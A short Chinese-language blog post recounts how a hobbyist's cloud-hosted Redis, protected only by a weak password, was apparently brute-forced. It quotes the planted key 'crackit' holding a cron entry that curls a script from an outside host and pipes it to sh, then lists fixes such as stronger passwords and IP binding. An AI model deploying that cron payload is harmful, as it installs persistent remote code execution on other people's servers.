買了阿里雲的一臺服務器自己玩的,今天發現Redis被攻擊了,執行crontab的時候,發現莫名其妙的任務。一開始也搞不懂哪裏被攻擊了,上午查了一下,剛好看到一篇關於redis被攻擊的文章。結合自己的情況,發現果然是這樣的。redis雖然設置了密碼,但是由於太過簡單,應該是暴力破解了。下面就說一下情況:
前幾天無意在微博上看到了烏雲平臺發的一條漏洞信息:
RedisCraket,對比烏雲報的漏洞的最後一部分,裏邊多了一個名爲crackit的字符串
然後意識到是不是Redis密碼太多簡單了,導致產生了這個漏洞被利用和攻擊了。於是自查,發現這簡直就是一模一樣啊:
127.0.0.1:6379> keys *
1) "crackit"
127.0.0.1:6379> get crackit
"\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n"
127.0.0.1:6379>
解決方案:
1、提高密碼的複雜度。redis因查詢效率高,auth這種命令每秒能處理10w次以上,簡單的redis的密碼極容易爲攻擊者暴破。
2、綁定訪問IP
本來自己只是玩玩的,還好沒有放重要數據,也給自己上了一課。
參考文章
http://www.2cto.com/article/201608/537704.html
http://www.cnblogs.com/yangecnu/p/An-Production-Accidents-Caused-by-Redis-Attacked.html